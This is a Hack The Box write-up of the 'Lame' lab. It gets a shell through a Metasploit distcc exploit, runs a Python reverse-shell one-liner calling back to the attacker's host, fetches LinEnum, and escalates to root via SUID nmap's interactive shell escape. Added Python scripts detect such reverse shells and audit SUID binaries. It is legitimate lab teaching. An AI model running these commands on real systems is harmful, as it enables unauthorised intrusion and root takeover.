Thursday, April 11, 2019

[Write-up] Hack The Box :: Lame, Part 2

In my last post, I used Metasploit to exploit an SMB vulnerability on HTB’s Lame and get root right off the bat. But we also found that another vulnerable application – distcc – was listening on port 3632. Let’s run through that and then do some privilege escalation.

Check out my previous post here:

First, let’s hit up El Goog to see what known exploits are available for distcc.

The very first link leads us to Rapid7’s page for a Metasploit module. So, let’s give it a try.

root@kali:~# msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)


Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................


Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


       =[ metasploit v5.0.4-dev                           ]
+ -- --=[ 1852 exploits - 1047 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > search distcc

Matching Modules
================

   Name                           Disclosure Date  Rank       Check  Description
   ----                           ---------------  ----       -----  -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution


msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.15:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uANPhYOytemCLjCC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uANPhYOytemCLjCC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.3:51297) at 2019-04-11 07:01:05 -0400


Now that we have a remote shell, let’s verify we’ve come to the right place and see who we are running as.

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b2:4d:ba 
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb2:4dba/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb2:4dba/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:183209 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4631 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:13626432 (12.9 MB)  TX bytes:739675 (722.3 KB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:40148 errors:0 dropped:0 overruns:0 frame:0
          TX packets:40148 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:20057083 (19.1 MB)  TX bytes:20057083 (19.1 MB)

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)


We are in, but not root. Time to gather some more information to see what our priv esc options are. But first, I want to upgrade this shell to be fully interactive. Unfortunately, Metasploit isn’t a great place to do this because of its session management. So let’s pop another reverse shell back to our Kali box and then upgrade it.
First, I start a netcat listener.

root@kali:~# nc -nvlp 9001
listening on [any] 9001 ...

Then, I’ll run this Python reverse shell on the target box. This can be found on pentestmonkey (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We catch the reverse shell on the Kali box.

root@kali:~# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.3] 49674
sh: no job control in this shell
sh-3.2$
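That one-liner is also a handy detection fixture. The script below is an added example, not from this write-up or from pentestmonkey: it triages `ps`-style process listings for the shape the one-liner has (an inline interpreter that opens a socket, dup2()s it onto fds 0-2 and execs a shell) and, separately, for an interactive shell running under a service account such as `daemon`, which is the account distcc handed us on this box. The process lines are constructed, and the service-account list and regexes are my assumptions rather than any product's rules.

```python
import re

# Accounts that should never own an interactive shell. Assumed list; tune per host.
SERVICE_ACCOUNTS = {"daemon", "www-data", "nobody", "distccd", "postgres"}

# One regex per indicator. A command line counts as the interpreter reverse-shell
# pattern only when the interpreter, socket, fd-redirect and shell-exec indicators
# all match; a lone socket import (see pid 1133 below) is not enough.
INDICATORS = {
    "inline_interpreter": re.compile(r"\b(python[0-9.]*|perl|ruby)\b\s+(-[A-Za-z]*\s+)*-(c|e)\b"),
    "socket": re.compile(r"socket\.socket\(|IO::Socket|TCPSocket"),
    "fd_redirect": re.compile(r"dup2\(.*?,\s*[012]\)|open\(STD(IN|OUT|ERR)"),
    "shell_exec": re.compile(r"/bin/(ba)?sh[\"']?\s*,\s*[\"']-i|exec\s*\(?\s*[\"']/bin/(ba)?sh"),
}
# Pulls the listener address out of a .connect(("ip", port)) call.
CONNECT = re.compile(r"\.connect\(\(?\s*[\"'](?P<ip>(\d{1,3}\.){3}\d{1,3})[\"']\s*,\s*(?P<port>\d+)")
INTERACTIVE_SHELL = re.compile(r"^(/usr)?(/bin/)?(ba)?sh\s+-i\b")
PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.*\S)\s*$")  # pid user args

# Constructed `ps -eo pid,user,args` output. Line 4821 is the page's own
# one-liner as it would appear on the target; the rest are benign fillers.
PS_SAMPLE = [
    "  PID USER     COMMAND",
    " 4821 daemon   python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.10.14.15\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    " 1133 root     python -c 'import socket; print(socket.gethostname())'",
    " 4822 daemon   /bin/sh -i",
    " 2210 www-data /usr/sbin/apache2 -k start",
]


def indicators_hit(args):
    """Names of the indicators present in one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(args)}


def is_reverse_shell(args):
    """True when all four structural indicators are present."""
    return {"inline_interpreter", "socket", "fd_redirect", "shell_exec"} <= indicators_hit(args)


def peer_of(args):
    """(ip, port) the command line connects back to, or None."""
    m = CONNECT.search(args)
    return (m.group("ip"), int(m.group("port"))) if m else None


def triage(ps_lines):
    """Return (pid, user, finding, peer) for every suspicious process line."""
    findings = []
    for line in ps_lines:
        m = PS_LINE.match(line)
        if not m:
            continue  # header or malformed line
        pid, user, args = int(m.group(1)), m.group(2), m.group(3)
        if is_reverse_shell(args):
            findings.append((pid, user, "interpreter reverse shell", peer_of(args)))
        elif user in SERVICE_ACCOUNTS and INTERACTIVE_SHELL.search(args):
            findings.append((pid, user, "interactive shell under service account", None))
    return findings


if __name__ == "__main__":
    for pid, user, what, peer in triage(PS_SAMPLE):
        print(f"pid {pid} ({user}): {what}" + (f", callback {peer[0]}:{peer[1]}" if peer else ""))
```

Run against the sample it flags pid 4821 with the 10.10.14.15:9001 callback and pid 4822, the `/bin/sh -i` that the one-liner spawns, while leaving the benign `python -c` under root alone. On a real host the same logic applies to auditd execve records; the service-account rule is the more durable of the two, since it catches the child shell regardless of which interpreter trick produced it.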

Now to upgrade. I always copy and paste the commands from this guide when upgrading shells: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/. Check out the full guide for some other tips.

sh-3.2$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@lame:/tmp$

[CTRL] + [Z] to background the netcat process

[1]+  Stopped                 nc -nvlp 9001
root@kali:~# stty raw -echo
root@kali:~# fg

Hit [ENTER] a few times.


We now have a fully interactive shell with tab completion.

Next, I want to download and run LinEnum.sh on the target box. LinEnum is a privilege escalation enumeration script and automates a lot of the tedium involved in priv esc.


First, from my Kali box:

Use wget to download the script from GitHub.

root@kali:~/htb/lame/privesc# wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-04-11 07:44:15--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: ‘LinEnum.sh’

LinEnum.sh                   100%[============================================>]  44.57K  --.-KB/s    in 0.03s  

2019-04-11 07:44:15 (1.30 MB/s) - ‘LinEnum.sh’ saved [45639/45639]

And then use the Python module SimpleHTTPServer to host it.

root@kali:~/htb/lame/privesc# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now from the target, I use wget to download the script.

daemon@lame:/tmp$ wget 10.10.14.15/LinEnum.sh
--06:49:19--  http://10.10.14.15/LinEnum.sh
           => `LinEnum.sh.1'
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45,639 (45K) [text/x-sh]

100%[====================================>] 45,639        --.--K/s            

06:49:19 (359.15 KB/s) - `LinEnum.sh.1' saved [45639/45639]

Make the script executable using chmod.

daemon@lame:/tmp$ chmod +x LinEnum.sh

And then execute. I’m using -t for thorough scans and then outputting the results to file, LinEnum.results.

daemon@lame:/tmp$ ./LinEnum.sh -t > LinEnum.results

Excerpt from LinEnum.results:

[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr

Looking through the results, I noticed that nmap is owned by root and has the SUID bit set. This means the binary runs with root’s effective privileges (euid=0) no matter which user launches it. For some more info on SUID, check this out: https://pentestlab.blog/2017/09/25/suid-executables/

Fortunately for us, nmap can be run in interactive mode and this will be our path to root.
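Since this SUID finding is what actually hands over root, here is the defender-side version of the check as an added example (not from the write-up or from LinEnum): it parses `ls -l` lines like the LinEnum excerpt above, keeps only root-owned entries with the setuid bit, and reports any that are not on an expected baseline, noting which are known to hand out a shell (older nmap with `--interactive`, as on this box) and which are only reachable by one group (the dhcp helper). The baseline set, the shell-capable table and the extra `/usr/bin/passwd` and `/usr/bin/harmless` lines are assumptions I constructed for the example.

```python
import re
from typing import NamedTuple, Optional

# Root-SUID binaries expected on this image. Hypothetical baseline; generate a
# real one from a known-good install of the same release and keep it under review.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/ping", "/bin/mount", "/bin/umount"}

# Binaries that give an interactive shell when run SUID root. The nmap entry is
# the case from this write-up (nmap 4.53's --interactive mode and its '!' escape).
SHELL_CAPABLE = {"/usr/bin/nmap": "nmap --interactive (removed in later releases) runs !sh as euid 0"}

# Fields of an `ls -l` line: mode, links, owner, group, size, month, day, year-or-time, path
LS_LINE = re.compile(
    r"^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)\s*$"
)

# Constructed sample: the three lines from the LinEnum excerpt above plus one
# expected SUID binary and one non-SUID binary to show they are ignored.
LINENUM_SAMPLE = [
    "-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script",
    "-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap",
    "-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr",
    "-rwsr-xr-x 1 root root 37084 Apr 15  2008 /usr/bin/passwd",   # constructed, in baseline
    "-rwxr-xr-x 1 root root 1234 Jan  1  2008 /usr/bin/harmless",   # constructed, no setuid bit
]


class SuidFile(NamedTuple):
    path: str
    owner: str
    group: str
    world_exec: bool  # others have 'x': any local user can invoke it


def parse_ls_line(line: str) -> Optional[SuidFile]:
    """Return a SuidFile for a setuid entry, or None for non-SUID or unparsable lines."""
    m = LS_LINE.match(line)
    if not m:
        return None
    mode = m.group("mode")
    if mode[3] not in "sS":  # the owner-execute slot carries the setuid bit
        return None
    return SuidFile(m.group("path"), m.group("owner"), m.group("group"), mode[9] == "x")


def audit(lines):
    """Return (path, reason) for every root-owned SUID file outside the baseline."""
    findings = []
    for f in filter(None, map(parse_ls_line, lines)):
        if f.owner != "root" or f.path in BASELINE:
            continue
        reason = SHELL_CAPABLE.get(f.path, "not in baseline")
        if not f.world_exec:
            reason += f"; only group {f.group} can run it"
        findings.append((f.path, reason))
    return findings


if __name__ == "__main__":
    for path, reason in audit(LINENUM_SAMPLE):
        print(f"{path}: {reason}")
```

On the sample this reports the dhcp helper (reachable only by group dhcp, so a lower-priority finding), nmap with the shell-escape note, and mtr as simply unexpected, while passwd and the non-SUID file are silent. The fix on the host side is the usual one: strip the setuid bit from anything not on the baseline (`chmod u-s`) or remove the package, and re-run the audit on a schedule so a newly installed SUID binary shows up as a diff rather than as a shell.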

Start nmap in interactive mode:

daemon@lame:/tmp$ /usr/bin/nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap>

I'll see what privileges I have first. Use ! to enter shell commands.

nmap> !id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

And then launch a shell session from inside nmap.

nmap> !sh
sh-3.2#

And we’re golden. I can now collect the flag in root.txt.

sh-3.2# cat /root/root.txt
92caac3be140ef****************